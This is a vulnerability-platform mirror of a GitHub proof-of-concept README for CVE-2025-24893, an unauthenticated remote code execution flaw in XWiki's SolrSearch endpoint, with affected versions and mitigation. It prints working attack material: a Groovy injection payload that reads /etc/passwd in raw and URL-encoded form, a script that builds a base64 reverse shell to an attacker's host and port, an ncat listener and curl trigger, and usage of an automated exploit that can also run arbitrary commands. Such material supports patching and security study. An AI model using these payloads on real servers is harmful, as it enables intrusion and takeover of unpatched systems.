漏洞平台

POC详情： ed65f083c7ebc8e16d3336e7596e3791fffe091a

来源

https://github.com/IIIeJlyXaKapToIIIKu/CVE-2025-24893-XWiki-unauthenticated-RCE-via-SolrSearch

关联漏洞

标题： XWiki Platform 安全漏洞 (CVE-2025-24893)
描述：XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞，该漏洞源于任何来宾用户都可以通过对SolrSearch的请求，造成远程代码执行。

描述

CVE-2025-24893 is a critical unauthenticated remote code execution (RCE) vulnerability in XWiki, a popular open-source enterprise wiki platform.

介绍

# CVE-2025-24893 – Unauthenticated Remote Code Execution in XWiki  

## 0  Table of Contents
1. [Summary](#1-summary)
2. [Vulnerability Details](#2-vulnerability-details)
3. [Affected Versions](#3-affected-versions)
4. [Proof-of-Concept](#5-proof-of-concept)
   * 4.1 [Building the payload](#51-build-the-payload)
   * 4.2 [Manual exploitation](#52-manual-exploitation)
   * 4.3 [Automated python exploit](#53-automated-exploit)
5. [Mitigation](#6-mitigation)
6. [Credits & References](#7-credits--references)

---

## 1  Summary <a name="1-summary"></a>

* **CVE:** 2025-24893  
* **Component:** `SolrSearch` macro (XWiki UI)  
* **Severity:** 9.8 / CRITICAL (CVSS 3.1)  
* **Attack vector:** Unauthenticated HTTP GET  
* **Impact:** Arbitrary Groovy execution → system-level RCE (permissions of the Jetty/Tomcat user)  

The `/xwiki/bin/get/Main/SolrSearch` endpoint concatenates untrusted `text=` input
straight into a Freemarker template.  
By prematurely closing the template and opening a new `{{groovy}} … {{/groovy}}`
block, an attacker executes arbitrary Groovy code without authentication.

---

## 2  Vulnerability Details <a name="2-vulnerability-details"></a>

```
GET /xwiki/bin/get/Main/SolrSearch?media=rss\&text=<<<USER-DATA>>>  HTTP/1.1
````

`SolrSearch` should embed the supplied text as plain content, but the macro
handler **fails to escape `}}}`**, so the following happens:

1. `}}}` closes the current Freemarker block.  
2. Attacker opens a **new macro**:  
```xwiki
   {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
```

* `async=false` forces synchronous execution (works even for guests).

3. Groovy runs with the permissions of the XWiki JVM process.

A minimal PoC that prints `/etc/passwd`:

```text
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
```

URL-encoded variant (spaces → `%20`, braces → `%7B/%7D`, etc.):

```
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
```

---

## 3  Affected Versions <a name="3-affected-versions"></a>

| Branch   | Fixed in                                   | Vulnerable ≤                     |
| -------- | ------------------------------------------ | -------------------------------- |
| 15.x     | **15.10.11**                               | 15.10.10 (and all 15.9 / 15.8 …) |
| 14.x LTS | **14.10.17**                               | 14.10.16                         |
| 13 / 12  | **Not maintained** – all remain vulnerable |                                  |

*(source: [OffSec advisory](https://www.offsec.com/blog/cve-2025-24893/) & XWiki
SEC-S 2025-02)*

![endpoint](images/XWiki_ver.png)

---

## 5  Proof of Concept <a name="5-proof-of-concept"></a>

### 5.1  Build the payload <a name="51-build-the-payload"></a>

```bash
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444

# 1.   one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"

# 2.   Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)

# 3.   wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'

# 4.   URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
```

### 5.2  Manual exploitation <a name="52-manual-exploitation"></a>

```bash
# start listener
sudo ncat -lvnp 4444

# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
```

### 5.3  Automated exploit <a name="53-automated-exploit"></a>

`xwiki_solr_rce.py` ships in `exploit/` (see code block below).

```bash
python CVE-2025-24893.py -u <TARGET URL> -l <IP> -p <PORT>
```
where
```
<TARGET URL> - URL including http:// or https://
```
*(pass `-c "id"` to run an arbitrary command instead of a shell)*
![exploit](images/running_exploit.png)
![revshell](images/reverse_shell.png)

---

## 6  Mitigation <a name="6-mitigation"></a>

* **Upgrade** to **15.10.11** / **14.10.17** or later
* Temporary workaround: disable the macro

```properties
# /etc/xwiki/xwiki.properties
solr.search.enabled = false
```

---

## 7  Credits & References <a name="7-credits--references"></a>

* OffSec Research: “Unauth RCE in XWiki” – 20 Feb 2025
* NVD entry: [https://nvd.nist.gov/vuln/detail/CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
* [Exploit-DB #52136](https://www.exploit-db.com/exploits/52136)

> Research & PoC: **DeX1d**

---

>Disclaimer: For educational use only. Running this against systems you do not own is illegal.

文件快照


 [4.0K]  /data/pocs/ed65f083c7ebc8e16d3336e7596e3791fffe091a
├── [2.0K]  CVE-2025-24893.py
├── [4.0K]  images
│   ├── [ 32K]  reverse_shell.png
│   ├── [ 33K]  running_exploit.png
│   └── [153K]  XWiki_ver.png
└── [4.5K]  README.md

1 directory, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。